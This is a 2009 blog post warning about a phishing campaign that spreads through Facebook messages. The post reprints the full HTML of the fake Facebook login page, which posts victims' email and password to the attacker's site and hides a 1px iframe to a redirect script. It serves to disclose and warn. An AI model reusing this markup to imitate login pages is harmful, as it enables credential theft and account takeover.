Facebook Trojan Attack

This morning, I received a facebook message that was short and questionable: "Check kirgo.at." Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page: Fake Facebook Page

While this page doesn't look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message ("Check X.at."). That's how the Trojan propogates.

Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.

Here is the rule: Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials. Period.

Update: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good move start for Facebook, who are still so new at the game that there are a number of security holes in their systems.

If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>Login</title>
	<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" />
</head>
<body class="login_page ie7 UIPage_LoggedOut Locale_en_US">
<div id="dropmenu_container"></div>
<div id="nonfooter">
	<div id="page_height" class="clearfix">
		<div id="menubar_container">
			<div id="fb_menubar" class="fb_menubar_logged_out clearfix">
				<div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo" style="height:85px;"></li></ul></div>
				<div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div>
			</div>
			<div class="signup_box clearfix" style="height:25px;">
				<div class="UILinkButton UILinkButton_SUBig"><a href="/" class="UILinkButton_A">Sign Up</a>
					<div class="UILinkButton_RW">
						<div class="UILinkButton_R"></div>
					</div>
				</div>
				<span class="signup_box_message" style="padding-left:15px;">We helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container">
				<div class="title_header add_border"><h2 class="no_icon">Login</h2></div>
				<form method="POST" action="/?login_attempt=1">
				<div id="loginform" style="">
				<div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div>
				<div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
				<label class="persistent"><input type="checkbox" class="inputcheckbox " name="persistent" value="1" /><span>Remember me</span></label>
				<div id="buttons" class="form_row clearfix"><label></label>
				<input type="submit" value="Login" name="login" id="login" class="inputsubmit" /></div><p class="reset_password form_row"><label></label><a href="/">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><br><br><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP"></span><span id="rtime" title="130">&copy;</span> <span title="10.18.7.118">20</span><span title="17409680">09</span></div>
</div><div id="pagefooter_links"><ul i
1df
d="pagefooter_left_links"><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Advertising</a></li><li><a href="/">Careers</a></li><li><a href="/">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="/">Privacy</a></li><li><a href="/">Mobile</a></li><li><a href="/">Help</a></li></ul></div></div></div><iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe><font></font><font></font><font></font><font></font>
</body>
</html>

This is not the only domain name that is attempting this, either, so beware!